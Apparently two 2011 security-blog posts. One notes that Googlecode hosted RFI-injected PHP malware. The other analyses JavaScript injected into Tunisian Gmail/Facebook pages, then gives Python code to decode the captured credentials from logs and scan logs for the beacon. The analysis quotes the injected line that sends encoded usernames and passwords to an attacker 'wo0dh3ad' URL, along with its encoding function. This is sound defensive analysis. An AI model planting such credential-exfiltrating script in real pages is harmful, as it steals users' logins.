Saturday, January 22, 2011

Googlecode for haxors.

I have just found on one of my honeypots that web haxors are now using Googlecode to store their PHP malware. This malware is injected into various websites by exploiting RFI vulnerabilities. The most active repo is majitoz.googlecode.com. You can browse the malware in the Downloads section. Sadly, there is nothing interesting at the moment, just fucking well-known PHP/Perl malware.

UPDATE: Google has been informed and majitoz has been taken down. Great responsiveness.

Friday, January 14, 2011

Tunisia haxors...

Some people have written about the JS code injected in Tunisia when you try to access websites like Gmail or Facebook. They say that the credentials are sent in clear text in the evil wo0dh3ad URL, but that is not entirely true, since there is a very small encoding, as we can see in this snippet.

var url = "www.fessebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55);

us3r and pa55 are encoded using the h6h() function, which is:


function h6h(st)
{
    var st2 = "";                       // encoded output, built up two letters per character
    for (var i = 0; i < st.length; i++) {
        var c = st.charCodeAt(i);       // code of the current character
        var ch = (c & 0xF0) >> 4;       // high nibble (0..15)
        var cl = c & 0x0F;              // low nibble (0..15)
        // each nibble becomes one letter in 'a'..'p' (97 is the code of 'a')
        st2 = st2 + String.fromCharCode(ch + 97) + String.fromCharCode(cl + 97);
    }
    return st2;
}


It just loops through the string and splits each 8-bit char into two 4-bit numbers. It then creates two new chars (chr()) by adding 97 (ord('a')) to each number and appends them to the encoded string, which is returned and inserted into the URL. A bit lame, isn't it? :-)

To decode us3r and pa55 from your logs, you can use this silly (no bounds checking) Python script:


[clem1@blah ~]$ cat unh6h.py
import sys

def unh6h(string):
    # two letters per byte: high nibble first, then low nibble, each offset by 97 ('a')
    u = ""
    for i in range(0, len(string), 2):
        s = ord(string[i]) - 97
        s <<= 4
        s += ord(string[i+1]) - 97
        u += chr(s)
    return u

print(unh6h(sys.argv[1]))


A quick test:


>>> h6h("password")
"hagbhdhdhhgphcge"
[clem1@blah ~]$ python unh6h.py "hagbhdhdhhgphcge"
password
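As an added example (my code, not the injected script's and not the post's unh6h.py): the same scheme in Python with the bounds and alphabet checks the quick script skips, a port of h6h() to round-trip against it, and a scan of access-log lines for the wo0dh3ad beacon that reports which accounts were captured without echoing the password itself. The sample log lines, the "alice" account and the request-line regex are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Nibble values 0..15 map to 'a'..'p' (97 + nibble), so a valid h6h string
# is an even-length run of those sixteen letters.
H6H_ALPHABET = "abcdefghijklmnop"

def is_h6h(s):
    # the bounds/alphabet check the post's quick decoder skips
    return len(s) % 2 == 0 and all(ch in H6H_ALPHABET for ch in s)

def h6h(text):
    """Python port of the injected h6h(): high-nibble letter, then low-nibble letter."""
    out = ""
    for ch in text:
        c = ord(ch) & 0xFF          # the JS masks with 0xF0/0x0F, so only one byte survives
        out += H6H_ALPHABET[c >> 4] + H6H_ALPHABET[c & 0x0F]
    return out

def unh6h(encoded):
    """Inverse of h6h(); raises instead of producing garbage on malformed input."""
    if not is_h6h(encoded):
        raise ValueError("not an h6h string: need even length and only letters a-p")
    pairs = zip(encoded[0::2], encoded[1::2])
    return "".join(chr((H6H_ALPHABET.index(h) << 4) | H6H_ALPHABET.index(l)) for h, l in pairs)

# Request line of an access/proxy log entry whose URL is the wo0dh3ad beacon (?q=..&u=..&p=..)
BEACON_RE = re.compile(r'"(?:GET|POST) (\S*wo0dh3ad\?[^" ]*)')

def find_wo0dh3ad_beacons(log_lines):
    """Return (decoded user, password length) for every beacon found in the log lines."""
    hits = []
    for line in log_lines:
        m = BEACON_RE.search(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m.group(1)).query)
        try:
            user = unh6h(params.get("u", [""])[0])
            password = unh6h(params.get("p", [""])[0])
        except ValueError:
            continue                # malformed beacon, not produced by h6h()
        hits.append((user, len(password)))   # report the victim, not the secret
    return hits

# Constructed sample log lines (hypothetical; not taken from the post).
SAMPLE_LOG = [
    '10.0.0.5 - - [14/Jan/2011:10:00:01 +0100] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.7 - - [14/Jan/2011:10:00:02 +0100] "GET http://www.fessebook.com/wo0dh3ad?q=ab12c&u=gbgmgjgdgf&p=hagbhdhdhhgphcge HTTP/1.1" 404 0',
]
```

Running find_wo0dh3ad_beacons(SAMPLE_LOG) on the constructed lines yields [('alice', 8)]: one captured account with an eight-character password.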